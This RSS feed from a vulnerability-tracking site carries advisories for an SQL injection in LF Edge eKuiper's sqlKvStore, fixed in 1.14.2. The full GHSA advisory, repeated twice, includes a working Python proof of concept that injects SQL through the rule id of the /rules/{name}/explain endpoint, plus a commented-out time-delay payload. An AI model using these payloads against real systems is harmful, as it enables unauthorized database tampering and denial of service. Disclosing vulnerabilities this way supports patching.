<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 04:14:10 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-159225</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-159225</link>
      <description>EUVD-2026-159225</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-159225</guid>
    </item>
    <item>
      <title>fkie_cve-2024-43406</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-43406</link>
      <description>&lt;p&gt;LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-43406</guid>
    </item>
    <item>
      <title>GHSA-r5ph-4jxm-6j9p — LF Edge eKuiper has a SQL Injection in sqlKvStore</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-r5ph-4jxm-6j9p</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/lf-edge/ekuiper, PyPI: ekuiper&lt;/p&gt;
&lt;p&gt;### Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.&lt;/p&gt;
&lt;p&gt;### Details
I will use explainRuleHandler (&amp;#34;/rules/{name}/explain&amp;#34;) as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.&lt;/p&gt;
&lt;p&gt;The SQL injection can happen in the code:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93
The code to accept user input is:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277&lt;/p&gt;
&lt;p&gt;The rule id in the above code can be used to exploit SQL query.&lt;/p&gt;
&lt;p&gt;Note that the delete function is also vulnerable:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141&lt;/p&gt;
&lt;p&gt;### PoC
```
import requests
from urllib.parse import quote&lt;/p&gt;
&lt;p&gt;# SELECT val FROM &amp;#39;xxx&amp;#39; WHERE key=&amp;#39;%s&amp;#39;;
payload = f&amp;#34;&amp;#34;&amp;#34;&amp;#39;; ATTACH DATABASE &amp;#39;test93&amp;#39; AS test93;
CREATE TABLE test93.pwn (dataz text);
INSERT INTO test93.pwn (dataz) VALUES (&amp;#34;sql injection&amp;#34;);--&amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;#payload = &amp;#34;deadbeef&amp;#39;; SELECT 123=LIKE(&amp;#39;ABCDEFG&amp;#39;,UPPER(HEX(RANDOMBLOB(100000000))));--&amp;#34;&lt;/p&gt;
&lt;p&gt;url = f&amp;#34;http://127.0.0.1:9081/rules/{quote(payload,safe=&amp;#39;&amp;#39;)}/explain&amp;#34;   # explainRuleHandler&lt;/p&gt;
&lt;p&gt;res = requests.get(url)
print(res.content)
```&lt;/p&gt;
&lt;p&gt;The screenshot shows the malicious SQL query to insert a value:
![image](https://github.com/user-…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/lf-edge/ekuiper, PyPI: ekuiper&lt;/p&gt;
&lt;p&gt;### Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.&lt;/p&gt;
&lt;p&gt;### Details
I will use explainRuleHandler (&amp;#34;/rules/{name}/explain&amp;#34;) as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.&lt;/p&gt;
&lt;p&gt;The SQL injection can happen in the code:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93
The code to accept user input is:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277&lt;/p&gt;
&lt;p&gt;The rule id in the above code can be used to exploit SQL query.&lt;/p&gt;
&lt;p&gt;Note that the delete function is also vulnerable:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141&lt;/p&gt;
&lt;p&gt;### PoC
```
import requests
from urllib.parse import quote&lt;/p&gt;
&lt;p&gt;# SELECT val FROM &amp;#39;xxx&amp;#39; WHERE key=&amp;#39;%s&amp;#39;;
payload = f&amp;#34;&amp;#34;&amp;#34;&amp;#39;; ATTACH DATABASE &amp;#39;test93&amp;#39; AS test93;
CREATE TABLE test93.pwn (dataz text);
INSERT INTO test93.pwn (dataz) VALUES (&amp;#34;sql injection&amp;#34;);--&amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;#payload = &amp;#34;deadbeef&amp;#39;; SELECT 123=LIKE(&amp;#39;ABCDEFG&amp;#39;,UPPER(HEX(RANDOMBLOB(100000000))));--&amp;#34;&lt;/p&gt;
&lt;p&gt;url = f&amp;#34;http://127.0.0.1:9081/rules/{quote(payload,safe=&amp;#39;&amp;#39;)}/explain&amp;#34;   # explainRuleHandler&lt;/p&gt;
&lt;p&gt;res = requests.get(url)
print(res.content)
```&lt;/p&gt;
&lt;p&gt;The screenshot shows the malicious SQL query to insert a value:
![image](https://github.com/user-…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-r5ph-4jxm-6j9p</guid>
    </item>
    <item>
      <title>PYSEC-2024-72</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2024-72</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ekuiper&lt;/p&gt;
&lt;p&gt;LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ekuiper&lt;/p&gt;
&lt;p&gt;LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2024-72</guid>
    </item>
  </channel>
</rss>
